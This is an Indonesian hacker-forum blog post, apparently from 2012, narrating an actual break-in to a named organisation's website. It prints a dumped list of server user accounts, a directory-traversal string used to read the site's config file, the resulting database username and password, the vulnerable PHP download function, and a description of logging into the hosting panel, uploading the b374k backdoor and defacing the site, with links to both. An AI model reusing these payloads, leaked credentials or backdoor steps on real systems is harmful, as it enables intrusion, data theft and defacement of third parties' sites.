k3078043:x:43420:43420::/u/k3078043/home:/c/bin/notifynoshell 
cgi-k3078043:x:43421:100::/:/bin/false 
h51242:x:43428:43428::/u/h51242/home:/c/bin/notifynoshell 
cgi-h51242:x:43429:100::/:/bin/false 
k2001502:x:43436:43436::/u/k2001502/home:/c/bin/notifynoshell 
cgi-k2001502:x:43437:100::/:/bin/false 
s10043:x:43438:43438::/home/s10043:/bin/bash 
k8099532:x:43441:43441::/u/k8099532/home:/c/bin/notifynoshell 
cgi-k8099532:x:43442:100::/:/bin/false 
k2938029:x:43443:43443::/u/k2938029/home:/bin/bash 
cgi-k2938029:x:43444:100::/:/bin/false 
k3885104:x:43445:43445::/u/k3885104/home:/c/bin/notifynoshell 
cgi-k3885104:x:43446:100::/:/bin/false 
s10044:x:43447:43447:staff:/home/s10044:/bin/bash 
s10045:x:43448:43448:staff:/home/s10045:/bin/bash 
k6447514:x:43449:43449::/u/k6447514/home:/c/bin/notifynoshell 
cgi-k6447514:x:43450:100::/:/bin/false 
k5593384:x:43451:43451::/u/k5593384/home:/c/bin/notifynoshell 
cgi-k5593384:x:43452:100::/:/bin/false 
k0640465:x:43455:43455::/u/k0640465/home:/c/bin/notifynoshell 
cgi-k0640465:x:43456:100::/:/bin/false 
k0114658:x:43457:43457::/u/k0114658/home:/c/bin/notifynoshell 
cgi-k0114658:x:43458:100::/:/bin/false 
k2569560:x:43467:43467::/u/k2569560/home:/c/bin/notifynoshell 
cgi-k2569560:x:43468:100::/:/bin/false 
k3835574:x:43469:43469::/u/k3835574/home:/c/bin/notifynoshell 
cgi-k3835574:x:43470:100::/:/bin/false 
k9049361:x:43471:43471::/u/k9049361/home:/c/bin/notifynoshell 
cgi-k9049361:x:43472:100::/:/bin/false 
k6602400:x:43475:43475::/u/k6602400/home:/c/bin/notifynoshell 
cgi-k6602400:x:43476:100::/:/bin/false 
k9436481:x:43479:43479::/u/k9436481/home:/bin/bash 
cgi-k9436481:x:43480:100::/:/bin/false 
k5738417:x:43487:43487::/u/k5738417/home:/c/bin/notifynoshell 
cgi-k5738417:x:43488:100::/:/bin/false 
k5896211:x:43489:43489::/u/k5896211/home:/c/bin/notifynoshell 
cgi-k5896211:x:43490:100::/:/bin/false 
k0426108:x:43499:43499::/u/k0426108/home:/c/bin/notifynoshell 
cgi-k0426108:x:43500:100::/:/bin/false 
k9462480:x:43501:43501::/u/k9462480/home:/c/bin/notifynoshell 
cgi-k9462480:x:43502:100::/:/bin/false 
k6976644:x:43505:43505::/u/k6976644/home:/c/bin/notifynoshell 
cgi-k6976644:x:43506:100::/:/bin/false 
k4063110:x:43217:43217::/u/k4063110/home:/c/bin/notifynoshell 
cgi-k4063110:x:43218:100::/:/bin/false 
h36341:x:42861:42773::/u/h36341/home:/c/bin/notifynoshell 
cgi-h36341:x:42862:42773::/:/bin/false 
k9555722:x:43513:43513::/u/k9555722/home:/c/bin/notifynoshell 
cgi-k9555722:x:43514:100::/:/bin/false 
k4574099:x:43515:43515::/u/k4574099/home:/c/bin/notifymigrated 
cgi-k4574099:x:43516:100::/:/bin/false 
k8246976:x:43521:43521::/u/k8246976/home:/c/bin/notifynoshell 
cgi-k8246976:x:43522:100::/:/bin/false 
k2469340:x:43523:43523::/u/k2469340/home:/bin/bash 
cgi-k2469340:x:43524:100::/:/bin/false 
k2331160:x:43527:43527::/u/k2331160/home:/bin/bash 
cgi-k2331160:x:43528:100::/:/bin/false 
k3616801:x:43535:43535::/u/k3616801/home:/c/bin/notifynoshell 
cgi-k3616801:x:43536:100::/:/bin/false 
k3783041:x:43537:43537::/u/k3783041/home:/bin/bash 
cgi-k3783041:x:43538:100::/:/bin/false 
k4655358:x:43541:43541::/u/k4655358/home:/c/bin/notifynoshell 
cgi-k4655358:x:43542:100::/:/bin/false 
k1334207:x:43551:43551::/u/k1334207/home:/bin/bash 
cgi-k1334207:x:43552:100::/:/bin/false 
k3965749:x:43553:43553::/u/k3965749/home:/c/bin/notifynoshell 
cgi-k3965749:x:43554:100::/:/bin/false 
k3039929:x:43557:43557::/u/k3039929/home:/c/bin/notifynoshell 
cgi-k3039929:x:43558:100::/:/bin/false 
k3640898:x:43559:43559::/u/k3640898/home:/c/bin/notifynoshell 
cgi-k3640898:x:43560:100::/:/bin/false 
k4152945:x:43561:43561::/u/k4152945/home:/bin/bash 
cgi-k4152945:x:43562:100::/:/bin/false 
irmadewi:x:43563:43563::/u/irmadewi/home:/c/bin/notifydisable 
cgi-irmadewi:x:43564:100::/:/bin/false 
cluesolu:x:43567:43567::/u/cluesolu/home:/c/bin/notifydisable 
cgi-cluesolu:x:43568:100::/:/bin/false 
k7677544:x:43569:43569::/u/k7677544/home:/bin/bash 
cgi-k7677544:x:43570:100::/:/bin/false 
rajutcoi:x:43579:43579::/u/rajutcoi/home:/c/bin/notifydisable 
cgi-rajutcoi:x:43580:100::/:/bin/false 
logampin:x:43581:43581::/u/logampin/home:/bin/bash 
cgi-logampin:x:43582:100::/:/bin/false 
h70300:x:35646:35646::/u/h70300/home:/c/bin/notifymigrated 
cgi-h70300:x:35647:100::/:/bin/false 
epestele:x:43585:43585::/u/epestele/home:/c/bin/notifydisable 
cgi-epestele:x:43586:100::/:/bin/false 
topbonus:x:43587:43587::/u/topbonus/home:/c/bin/notifydisable 
cgi-topbonus:x:43588:100::/:/bin/false 
paniisco:x:43589:43589::/u/paniisco/home:/c/bin/notifynoshell 
cgi-paniisco:x:43590:100::/:/bin/false 
s10048:x:43595:43595::/home/s10048:/bin/bash 
s10049:x:43596:43596::/home/s10049:/bin/bash 
s10050:x:43597:43597::/home/s10050:/bin/bash 
k8492651:x:43598:43598::/u/k8492651/home:/c/bin/notifynoshell 
cgi-k8492651:x:43599:100::/:/bin/false 
s10051:x:43600:43600::/home/s10051:/bin/sh 
s10052:x:43601:43601::/home/s10052:/bin/bash 
enviroca:x:43602:43602::/u/enviroca/home:/c/bin/notifynoshell 
cgi-enviroca:x:43603:100::/:/bin/false 
k1214217:x:43605:43605::/u/k1214217/home:/c/bin/notifynoshell 
cgi-k1214217:x:43606:100::/:/bin/false 
k5970405:x:43607:43607::/u/k5970405/home:/c/bin/notifynoshell 
cgi-k5970405:x:43608:100::/:/bin/false 
k4301708:x:43609:43609::/u/k4301708/home:/c/bin/notifynoshell 
cgi-k4301708:x:43610:100::/:/bin/false 
k8128814:x:43611:43611::/u/k8128814/home:/c/bin/notifynoshell 
cgi-k8128814:x:43612:100::/:/bin/false 
k1068705:x:43613:43613::/u/k1068705/home:/c/bin/notifynoshell 
cgi-k1068705:x:43614:100::/:/bin/false 
s24219:x:43615:43615::/home/s24219:/bin/sh 
k6038342:x:43616:43616::/u/k6038342/home:/c/bin/notifynoshell 
cgi-k6038342:x:43617:100::/:/bin/false 
k4264473:x:43618:43618::/u/k4264473/home:/c/bin/notifynoshell 
cgi-k4264473:x:43619:100::/:/bin/false 
kenkotec:x:43620:43620::/u/kenkotec/home:/c/bin/notifynoshell 
cgi-kenkotec:x:43621:100::/:/bin/false 
k9232420:x:43622:43622::/u/k9232420/home:/c/bin/notifynoshell 
cgi-k9232420:x:43623:100::/:/bin/false 
s10057:x:43624:43624:staff:/home/s10057:/bin/bash 
s10058:x:43625:43625:staff:/home/s10058:/bin/bash 
audiocen:x:43868:43868::/u/audiocen/home:/c/bin/notifynoshell 
cgi-audiocen:x:43869:100::/:/bin/false 
k7124209:x:43543:43543::/u/k7124209/home:/c/bin/notifynoshell 
cgi-k7124209:x:43544:100::/:/bin/false 
s10059:x:43870:43870:staff:/home/s10059:/bin/bash 
k9079668:x:43873:43873::/u/k9079668/home:/c/bin/notifynoshell 
cgi-k9079668:x:43874:100::/:/bin/false 
s10060:x:43875:43875:staff:/home/s10060:/bin/bash 
s10061:x:43876:43876:staff:/home/s10061:/bin/bash 
s10062:x:43877:43877:staff:/home/s10062:/bin/bash 
k5807247:x:43878:43878::/u/k5807247/home:/c/bin/notifymigrated 
cgi-k5807247:x:43879:100::/:/bin/false 
k0120309:x:44900:44900::/u/k0120309/home:/c/bin/notifynoshell 
cgi-k0120309:x:44901:100::/:/bin/false 
s10063:x:44902:44902:staff:/home/s10063:/bin/bash 
s10064:x:44903:44903:staff:/home/s10064:/bin/bash 
k0006389:x:44904:44904::/u/k0006389/home:/c/bin/notifynoshell 
cgi-k0006389:x:44905:100::/:/bin/false 
k1635307:x:44906:44906::/u/k1635307/home:/c/bin/notifynoshell 
cgi-k1635307:x:44907:100::/:/bin/false 
k6600110:x:44908:44908::/u/k6600110/home:/c/bin/notifynoshell 
cgi-k6600110:x:44909:100::/:/bin/false 
k6838494:x:44910:44910::/u/k6838494/home:/c/bin/notifynoshell 
cgi-k6838494:x:44911:100::/:/bin/false 
k7449141:x:44912:44912::/u/k7449141/home:/c/bin/notifynoshell 
cgi-k7449141:x:44913:100::/:/bin/false 
k7955014:x:44914:44914::/u/k7955014/home:/c/bin/notifynoshell 
cgi-k7955014:x:44915:100::/:/bin/false 
k9591954:x:44916:44916::/u/k9591954/home:/c/bin/notifynoshell 
cgi-k9591954:x:44917:100::/:/bin/false 
k0519824:x:44918:44918::/u/k0519824/home:/c/bin/notifynoshell 
cgi-k0519824:x:44919:100::/:/bin/false 
k7724118:x:44920:44920::/u/k7724118/home:/c/bin/notifynoshell 
cgi-k7724118:x:44921:100::/:/bin/false 
k3112242:x:44922:44922::/u/k3112242/home:/c/bin/notifynoshell 
cgi-k3112242:x:44923:100::/:/bin/false 
k4746423:x:44924:44924::/u/k4746423/home:/c/bin/notifynoshell 
cgi-k4746423:x:44925:100::/:/bin/false 
k6098695:x:44926:44926::/u/k6098695/home:/c/bin/notifymigrated 
cgi-k6098695:x:44927:100::/:/bin/false 
k7929737:x:44928:44928::/u/k7929737/home:/c/bin/notifynoshell 
cgi-k7929737:x:44929:100::/:/bin/false 
k9844893:x:44930:44930::/u/k9844893/home:/c/bin/notifynoshell 
cgi-k9844893:x:44931:100::/:/bin/false 
k9487357:x:44932:44932::/u/k9487357/home:/bin/bash 
cgi-k9487357:x:44933:100::/:/bin/false 
k9407991:x:44934:44934::/u/k9407991/home:/c/bin/notifynoshell 
cgi-k9407991:x:44935:100::/:/bin/false 
k0058418:x:44936:44936::/u/k0058418/home:/c/bin/notifynoshell 
cgi-k0058418:x:44937:100::/:/bin/false 
k4815503:x:44938:44938::/u/k4815503/home:/c/bin/notifynoshell 
cgi-k4815503:x:44939:100::/:/bin/false 
k5269028:x:44940:44940::/u/k5269028/home:/c/bin/notifynoshell 
cgi-k5269028:x:44941:100::/:/bin/false 
k2456504:x:44942:44942::/u/k2456504/home:/c/bin/notifynoshell 
cgi-k2456504:x:44943:100::/:/bin/false 
k7321389:x:44944:44944::/u/k7321389/home:/c/bin/notifynoshell 
cgi-k7321389:x:44945:100::/:/bin/false</blockquote>
setelah itu kital liat file configurasinya 
<blockquote class="tr_bq">
../../../../../../../../../../../home/sloki/user/h15941/sites/titiandamai.or.id/www/config.php</blockquote>
PHP Code 
<blockquote class="tr_bq">
<div class="title">
</div>
<code>$dbhost = "localhost";$dbuname = "h15941_itp";$dbpass = "kajoku1275";$dbname = "h15941_itp";$prefix = "itp";$user_prefix = "itp";$dbtype = "MySQL"; </code></blockquote>
kenapa itu bisa terjadi?... awalnya ane bingung, tapi pas ane coba 
sedikir pelajarin dari script php yang berhasil ane download dari 
target, terdapat vuln di 
<blockquote class="tr_bq">
<code>function download_http($nama_file){             global $prefix, $dbi;     $path_to_file = "file/riset/$nama_file";   if($nama_file != ""){      if (file_exists($path_to_file)) {                   Header('Content-type: aperdalication/force-download');          Header('Content-Disposition: attachment; filename=' . "$nama_file");              $fd = fopen ($path_to_file, "rb");          $contents = fread ($fd, filesize ($path_to_file));          fclose ($fd);            print $contents;       }else{               //file tidak ada               }//end if   }else{         Header("Location: konten.php?nama=Riset&op=index_riset");   }//end if}//end download_http </code></blockquote>
mudah-mudahan bener itu terdapat vuln <img alt="piss" border="0" src="http://devilzc0de.org/forum/images/smilies/005.gif" style="vertical-align: middle;" title="piss" /> 
 
okeh karena kita udah ngedapetin file configurasi, sekarang kita coba login panel-nya. 
sebelumnya ane scan dulu itu target, untuk ngeliat port dan service yang open, setelah ane scan wew <img alt="ketawa" border="0" src="http://devilzc0de.org/forum/images/smilies/ketawa.gif" style="vertical-align: middle;" title="ketawa" /> ada service https yang open, boleh jadi ini halaman login. 
sekarang kita test url jadi seperti ini 
<a href="https://titiandamai.or.id/" target="_blank">https://titiandamai.or.id/</a> 
okeh ternyata menggunakan sPanel 
sekarang kita coba login ke sPanel 
<div class="separator" style="clear: both; text-align: center;">
<a href="http://oi41.tinypic.com/2nvb0xs.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="159" src="http://oi41.tinypic.com/2nvb0xs.jpg" width="320" /></a></div>
<img alt="ketawa" border="0" src="http://devilzc0de.org/forum/images/smilies/ketawa.gif" style="vertical-align: middle;" title="ketawa" /> kita bisa masuk 
<div class="separator" style="clear: both; text-align: center;">
<a href="http://oi43.tinypic.com/10mptls.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="http://oi43.tinypic.com/10mptls.jpg" width="320" /></a></div>
 
jalan-jalan deh <img alt="ketawa" border="0" src="http://devilzc0de.org/forum/images/smilies/ketawa.gif" style="vertical-align: middle;" title="ketawa" /> 
<div class="separator" style="clear: both; text-align: center;">
<a href="http://oi39.tinypic.com/153loud.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="http://oi39.tinypic.com/153loud.jpg" width="320" /></a></div>
 
 
 
 
untuk upload backdoor b374k <img alt="ketawa" border="0" src="http://devilzc0de.org/forum/images/smilies/ketawa.gif" style="vertical-align: middle;" title="ketawa" /> 
<div class="separator" style="clear: both; text-align: center;">
<a href="http://oi41.tinypic.com/35nbq5w.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="143" src="http://oi41.tinypic.com/35nbq5w.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://oi39.tinypic.com/1571wkm.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="http://oi39.tinypic.com/1571wkm.jpg" width="320" /></a></div>
perview : 
b374k = <a href="http://titiandamai.or.id/index2.php" target="_blank">http://titiandamai.or.id/index2.php</a> 
belajar pepes = <a href="http://titiandamai.or.id/index.html" target="_blank">http://titiandamai.or.id/index.html</a> 
 
terimakasih atas perhatiannya temen-temen <img alt="ketawa" border="0" src="http://devilzc0de.org/forum/images/smilies/ketawa.gif" style="vertical-align: middle;" title="ketawa" /> maafin ane kalo ada salah-salah kata ya om.. 
 
.:Devilzc0de:.

From LFI+Backdoor+Deface

selamat malam teman-teman P-D malem ini ane mau coba praktekin tentang LFI (local file inclusion), sebenernya udah banyak juga sih di sini yang ngebahas tetang LFI, tapi ane mau coba lagi nge-refres…

08 Feb 2012